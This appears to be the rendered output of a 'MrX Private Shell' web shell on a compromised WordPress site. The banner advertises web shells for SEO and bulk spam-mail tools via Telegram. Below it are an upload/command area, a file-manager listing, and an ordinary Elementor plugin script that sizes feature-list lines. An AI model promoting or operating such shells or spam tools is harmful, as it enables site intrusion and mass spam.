__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
"use strict";
(function ($) {
    $(window).on('elementor/frontend/init', function () {
        // Define the custom handler for the Feature List line adjustments
        let FeatureListLineHandler = elementorModules.frontend.handlers.Base.extend({
            onInit: function onInit() {
                this.adjustFeatureListLines();
                $(window).resize(this.adjustFeatureListLines.bind(this));
            },

            adjustFeatureListLines: function adjustFeatureListLines() {
                let $scope = this.$element;

                $scope.find('.king-addons-feature-list-item:not(:last-of-type)').find('.king-addons-feature-list-icon-wrap').each(function (index) {
                    let nextOffsetTop = $scope.find('.king-addons-feature-list-item').eq(index + 1).find('.king-addons-feature-list-icon-wrap').offset().top;
                    let currentOffsetTop = $(this).offset().top;

                    // Calculate the line height
                    let lineHeight = nextOffsetTop - currentOffsetTop;

                    // Apply the calculated height to the line
                    $(this).find('.king-addons-feature-list-line').css('height', lineHeight + 'px');
                });
            }
        });

        // Initialize the handler when the specific widget is ready in Elementor
        elementorFrontend.hooks.addAction('frontend/element_ready/king-addons-feature-list.default', function ($scope) {
            elementorFrontend.elementsHandler.addHandler(FeatureListLineHandler, {
                $element: $scope
            });
        });
    });
})(jQuery);

Filemanager

Name Type Size Permission Actions
Feature_List.php File 35.17 KB 0640
script.js File 1.58 KB 0640
style.css File 2.21 KB 0640
Filemanager